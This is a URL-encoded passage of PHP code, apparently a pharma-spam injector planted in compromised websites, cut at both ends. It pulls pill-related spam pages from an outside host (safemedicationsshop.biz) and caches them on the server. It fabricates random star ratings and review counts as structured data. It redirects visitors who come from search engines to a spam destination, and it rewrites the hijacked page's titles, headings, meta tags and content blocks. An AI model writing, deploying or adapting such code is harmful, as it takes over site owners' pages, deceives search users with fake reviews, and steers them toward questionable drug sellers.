0%20%20%20%20%20%20%20%24parkey%20%3D%20%24key%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20foreach%20%28%24epills%20as%20%24pill%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24pill%20%3D%20trim%28%24pill%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28strstr%28%24key%2C%20%24pill%29%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24tdpill%20%3D%20str_replace%28%27%20%27%2C%20%27%2B%27%2C%20%24pill%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24tkey%20%3D%20str_replace%28%27%20%27%2C%20%27-%27%2C%20%24key%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24ttxt%20%3D%20httpget%28%22http%3A%2F%2Fsafemedicationsshop.biz%2Flnk%2Fgen%2Findex.php%3Fkey%3D%24tkey%26g%3D%24group%26lang%3D%24lang%26page%3D%24page%26cldw%3D%24cldw%26dd%3D%24ddomain%26pill%3D%24tdpill%26nolinks%3D1%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27%23%3Chtml%23is%27%2C%20%24ttxt%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%24ttxt%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20file_put_contents%28%22%7B%24eb%7D%7B%24st%7D%2F%24page.html%22%2C%20%24ttxt%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20die%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20preg_match%28%27%23gogogo%28.%2A%29enenen%23is%27%2C%20%24ttxt%2C%20%24mtchs%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24etxt%20%3D%20explode%28%27%7C%7C%27%2C%20%24mtchs%5B1%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24key%20%3D%20%24etxt%5B0%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24epill%20%3D%20explode%28%27%20-%20%27%2C%20%24key%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24ttpill%20%3D%20trim%28%24epill%5B1%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24title%20%3D%20ucfirst%28%24key%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24h1%20%3D%20ucfirst%28%24etxt%5B1%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24rating%20%3D%20rand%284%2C%205%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24rcount%20%3D%20rand%2822%2C%20222%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24txt%20%3D%20%22%3Cdiv%20itemscope%3D%5C%22%5C%22%20itemtype%3D%5C%22http%3A%2F%2Fschema.org%2FProduct%5C%22%3E%5Cn%3Cspan%20itemprop%3D%5C%22name%5C%22%3E%24parkey%20rating%3C%2Fspan%3E%5Cn%3Cdiv%20itemprop%3D%5C%22aggregateRating%5C%22%20itemscope%3D%5C%22%5C%22%20itemtype%3D%5C%22http%3A%2F%2Fschema.org%2FAggregateRating%5C%22%3E%5Cn%3Cspan%20itemprop%3D%5C%22ratingValue%5C%22%3E%24rating-5%3C%2Fspan%3E%20stars%20based%20on%5Cn%3Cspan%20itemprop%3D%5C%22reviewCount%5C%22%3E%24rcount%3C%2Fspan%3E%20reviews%5Cn%3C%2Fdiv%3E%5Cn%3C%2Fdiv%3E%5Cn%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24desc%20%3D%20%24etxt%5B2%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24txt%20.%3D%20%24etxt%5B3%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24desc%20%3D%3D%20%27desc%27%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24desc%20%3D%20httpget%28%22http%3A%2F%2Fsafemedicationsshop.biz%2Flnk%2Fgen%2Fdesc.php%3Fkey%3D%24tkey%26desc%3D%24group%26pill%3D%24tdpill%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20preg_match%28%27%23gogogo%28.%2A%29enenen%23is%27%2C%20%24desc%2C%20%24mtchs%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24mtchs%20%26%26%20isset%28%24mtchs%5B1%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24desc%20%3D%20%24mtchs%5B1%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24desc%20%3D%20%27%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20file_put_contents%28%22%7B%24eb%7D%7B%24st%7D%2F%24page.txt%22%2C%20%22%24title%40%40%40%24desc%40%40%40%24txt%40%40%40%24h1%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24newclpage%20%3D%20str_replace%28%27%7C%27%2C%20%27%2F%27%2C%20%24page%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24newcllink%20%3D%20%22%3Ca%20href%3D%5C%22http%3A%2F%2F%24newclpage%5C%22%3E%24parkey%3C%2Fa%3E%0A%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24cldw%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20file_put_contents%28%22%7B%24eb%7D%7B%24st%7D%2Fcldwmap.txt%22%2C%20%24newcllink%2C%20FILE_APPEND%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20if%20%28%28%24_GET%5B%24qq%5D%20%7C%7C%20%24cldw%29%20%26%26%20%24fromse%20%26%26%20%21%24abt%20%26%26%20%21%24morda%29%20%7B%0A%20%20%20%20%20%20%20%20if%20%28%21%24redcode%20%26%26%20%24key%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24tkey%20%3D%20str_replace%28%27%20%27%2C%20%27%2B%27%2C%20%24key%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28strstr%28%24redir%2C%20%27%3F%27%29%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24redir%20.%3D%20%22%26keyword%3D%22%20.%20%24tkey%20.%20%22%26pill%3D%24tdpill%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20else%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24redir%20.%3D%20%22%3Fkeyword%3D%22%20.%20%24tkey%20.%20%22%26pill%3D%24tdpill%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20header%28%22Location%3A%20%24redir%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cscript%20type%3D%5C%22text%2Fjavascript%5C%22%3Elocation.href%3D%5C%22%24redir%5C%22%3B%3C%2Fscript%3E%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20die%28%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20else%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24redcode%20%3D%20str_replace%28%27KEY%27%2C%20%24key%2C%20%24redcode%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20echo%20stripslashes%28%24redcode%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%24cldwmap%20%3D%20%40file%28%22%7B%24eb%7D%7B%24st%7D%2Fcldwmap.txt%22%2C%20FILE_SKIP_EMPTY_LINES%20%7C%20FILE_IGNORE_NEW_LINES%29%3B%0A%0A%20%20%20%20ob_start%28%29%3B%0A%0A%20%20%20%20function%20shutdown%28%29%20%7B%0A%20%20%20%20%20%20%20%20global%20%24morda%3B%0A%20%20%20%20%20%20%20%20global%20%24eb%3B%0A%20%20%20%20%20%20%20%20global%20%24txt%3B%0A%20%20%20%20%20%20%20%20global%20%24qq%3B%0A%20%20%20%20%20%20%20%20global%20%24key%3B%0A%20%20%20%20%20%20%20%20global%20%24desc%3B%0A%20%20%20%20%20%20%20%20global%20%24lang%3B%0A%20%20%20%20%20%20%20%20global%20%24cldwmap%3B%0A%20%20%20%20%20%20%20%20global%20%24el%3B%0A%20%20%20%20%20%20%20%20global%20%24dw%3B%0A%20%20%20%20%20%20%20%20global%20%24cldw%3B%0A%20%20%20%20%20%20%20%20global%20%24redcode%3B%0A%20%20%20%20%20%20%20%20global%20%24abt%3B%0A%20%20%20%20%20%20%20%20global%20%24hspan%3B%0A%20%20%20%20%20%20%20%20global%20%24h1%3B%0A%20%20%20%20%20%20%20%20%24title%20%3D%20ucfirst%28%24key%29%3B%0A%20%20%20%20%20%20%20%20%24my_content%20%3D%20ob_get_contents%28%29%3B%0A%20%20%20%20%20%20%20%20ob_end_clean%28%29%3B%0A%20%20%20%20%20%20%20%20if%20%28%24key%20%26%26%20%28%24abt%20OR%20isset%28%24_GET%5B%24qq%5D%29%29%29%20%7B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24cldw%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20preg_match_all%28%27%23%3Ca%20%28.%2A%29%3C%2Fa%3E%23iUm%27%2C%20%24my_content%2C%20%24ahrefs%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24cntahrefs%20%3D%20count%28%24ahrefs%5B0%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24cntcldwmap%20%3D%20count%28%24cldwmap%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24i%20%3D%200%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20foreach%20%28%24ahrefs%5B0%5D%20as%20%24ahref%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24cldwmap%5B%24i%5D%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20str_replace%28%24ahref%2C%20%24cldwmap%5B%24i%5D%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24i%2B%2B%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24morda%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24cldwfooter%20%3D%20%27%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20foreach%20%28%24cldwmap%20as%20%24cldwflink%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24cldwfooter%20.%3D%20%22%24cldwflink%20%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20str_replace%28%27%3C%2Fbody%3E%27%2C%20%22%3Cfooter%3E%0A%3Cdiv%20class%3D%5C%22tags_cloud%20footer%20column%20block%5C%22%20id%3D%5C%22tags_cloud%20footer%20column%20block%5C%22%3E%0A%24cldwfooter%0A%3C%2Fdiv%3E%0A%3C%2Ffooter%3E%0A%3C%2Fbody%3E%22%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%21%24morda%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Ctitle%28.%2A%29%3C%5C%2Ftitle%3E%23iUs%27%2C%20%22%3Ctitle%3E%24title%3C%2Ftitle%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%22%23%3Clink%20rel%3D%5B%5C%22%5C%27%5D%7B1%7Dcanonical%28.%2A%29%5C%3E%23iUs%22%2C%20%27%27%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%22%23%3Clink%20rel%3D%5B%5C%22%5C%27%5D%7B1%7Dshortlink%28.%2A%29%5C%3E%23iUs%22%2C%20%27%27%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Ch1%28.%2A%29%3C%5C%2Fh1%3E%23iUm%27%2C%20%22%3Ch1%3E%24h1%3C%2Fh1%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Ch2%28.%2A%29%3C%5C%2Fh2%3E%23iUm%27%2C%20%22%3Ch2%3E%24h1%3C%2Fh2%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Ch3%28.%2A%29%3C%5C%2Fh3%3E%23iUm%27%2C%20%22%3Ch3%3E%24h1%3C%2Fh3%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%22%23%3Cmeta%20name%3D%5B%5C%22%5C%27%5D%7B1%7Ddescription%28.%2A%29%5C%3E%23iUs%22%2C%20%27%27%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%22%23%3Cmeta%20name%3D%5B%5C%22%5C%27%5D%7B1%7Drobots%28.%2A%29%5C%3E%23iUs%22%2C%20%27%27%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%22%23%3Cmeta%20name%3D%5B%5C%22%5C%27%5D%7B1%7Dkeywords%28.%2A%29%5C%3E%23iUs%22%2C%20%27%27%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20str_replace%28%27%3C%2Fhead%3E%27%2C%20%22%3Cmeta%20name%3D%5C%22description%5C%22%20content%3D%5C%22%24desc%5C%22%3E%5Cn%3C%2Fhead%3E%22%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%22%23%3Cmeta%20property%3D%5B%5C%22%5C%27%5D%7B1%7Dog%3A%28.%2A%29%5B%5C%22%5C%27%5D%7B1%7D%20content%3D%5B%5C%22%5C%27%5D%7B1%7D.%2A%5B%5C%22%5C%27%5D%7B1%7D%5Cs%3F%5C%2F%3E%23iUs%22%2C%20%27%27%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cscript%28.%2A%29%3C%5C%2Fscript%3E%23iUs%27%2C%20%27%27%2C%20%24my_content%2C%201%29%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%40preg_match%28%27%23%3Carticle%28.%2A%29%3C%5C%2Farticle%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Carticle%28.%2A%29%3C%5C%2Farticle%3E%23iUs%27%2C%20%22%3Carticle%3E%5Cn%24txt%5Cn%3C%2Farticle%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20id%3D%22page-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20id%3D%22page-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22page-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22page-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22maincontent%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22maincontent%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22home-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22home-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22content%22%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22content%22%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20id%3D%22content%22%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20id%3D%22content%22%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20id%3D%22content%22%20class%3D%22clearfix%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20id%3D%22content%22%20class%3D%22clearfix%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20id%3D%22content%22%20class%3D%22hfeed%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20id%3D%22content%22%20class%3D%22hfeed%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22content%20clearfix%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22content%20clearfix%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22body_container%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22body_container%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20id%3D%22content%22%20class%3D%22widecolumn%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20id%3D%22content%22%20class%3D%22widecolumn%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20id%3D%22entry-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20id%3D%22entry-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22entry-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22entry-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20id%3D%22main-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20id%3D%22main-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20id%3D%22content-area%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20id%3D%22content-area%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22post-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22post-content%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22item-page%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22item-page%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22grid%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22grid%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22page%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22page%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22column%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22column%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22nextend-flux%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22nextend-flux%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Ctable%28.%2A%29%3E%23iUs%27%29%29%20%7B%0A%20%20%20%20%20%20%2